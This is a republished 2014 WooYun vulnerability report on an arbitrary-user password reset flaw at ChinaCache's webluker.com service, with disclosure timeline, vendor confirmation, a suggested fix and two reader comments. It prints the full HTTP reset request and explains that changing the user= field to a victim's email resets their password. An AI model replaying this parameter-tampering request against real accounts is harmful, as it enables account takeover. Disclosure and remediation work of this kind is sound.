ChinaCache旗下豆豆网任意用户密码重置漏洞

admin
admin
admin
101400
文章
87
评论
2015年6月9日16:07:48评论237 views字数 229阅读0分45秒阅读模式
摘要

2014-09-05: 细节已通知厂商并且等待厂商处理中
2014-09-06: 厂商已经确认,细节仅向厂商公开
2014-09-16: 细节向核心白帽子及相关领域专家公开
2014-09-26: 细节向普通白帽子公开
2014-10-06: 细节向实习白帽子公开
2014-10-20: 细节向公众公开

漏洞概要 关注数(4) 关注此漏洞

缺陷编号: WooYun-2014-75175

漏洞标题: ChinaCache旗下豆豆网任意用户密码重置漏洞

相关厂商: ChinaCache

漏洞作者: 专业种田ChinaCache旗下豆豆网任意用户密码重置漏洞

提交时间: 2014-09-05 17:35

公开时间: 2014-10-20 17:36

漏洞类型: 设计缺陷/逻辑错误

危害等级: 中

自评Rank: 10

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 逻辑错误 设计不当 认证设计不合理

0人收藏

漏洞详情

披露状态:

2014-09-05: 细节已通知厂商并且等待厂商处理中
2014-09-06: 厂商已经确认,细节仅向厂商公开
2014-09-16: 细节向核心白帽子及相关领域专家公开
2014-09-26: 细节向普通白帽子公开
2014-10-06: 细节向实习白帽子公开
2014-10-20: 细节向公众公开

简要描述:

中秋回馈老客户。

详细说明:

www.webluker.com

通过找回密码功能向自己邮箱发送邮件,通过找回密码链接修改密码,提交时把user= 改成需要重置密码的邮箱,可重置任意用户密码。

邮箱收到链接

http:/cb4f4106727bc6ac71bcd772b75b4e75

code 区域 
POST /registration/resetpwd-post/ HTTP/1.1
 Host: my.webluker.com
 Proxy-Connection: keep-alive
 Content-Length: 118
 Cache-Control: max-age=0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Origin: http://my.webluker.com
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36
 Content-Type: application/x-www-form-urlencoded
 Referer: http://my.webluker.com/registration/resetpwd/xxx%40163.com/cb4f4106727bc6ac71bcd772b75b4e75/
 Accept-Encoding: gzip,deflate
 Accept-Language: zh-CN,zh;q=0.8
 Cookie: __utma=137492268.1016743737.1409905143.1409905143.1409905143.1; __utmc=137492268; __utmz=137492268.1409905143.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionid=xxx; Hm_lvt_4700009a588291bd098c775bda15503b=1409904436; Hm_lpvt_4700009a588291bd098c775bda15503b=1409907373; csrftoken=3ff7e1953f8aafd02106e3930b4d1639
 
 csrfmiddlewaretoken=3ff7e1953f8aafd02106e3930b4d1639&user=xxx%40163.com&password1=111111&password2=111111&fromuid=

ChinaCache旗下豆豆网任意用户密码重置漏洞

漏洞证明:

ChinaCache旗下豆豆网任意用户密码重置漏洞

成功登录

ChinaCache旗下豆豆网任意用户密码重置漏洞

修复方案:

对找回密码链接进行帐号校验。

版权声明:转载请注明来源 专业种田@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-09-06 09:55

厂商回复:

问题已确认,属于业务逻辑问题,已通知研发处理

谢谢 @专业种田

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-09-06 13:21 | p4ssw0rd ( 普通白帽子 | Rank:306 漏洞数:92 | 不作死就不会死)

    1

    膜拜大牛~

  2. 2014-10-20 20:40 | PanFake ( 路人 | Rank:6 漏洞数:5 | 略懂略懂)

    0

    我去。。。之前都用这家CDN,这密码重置漏洞也恶心了点吧。。。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin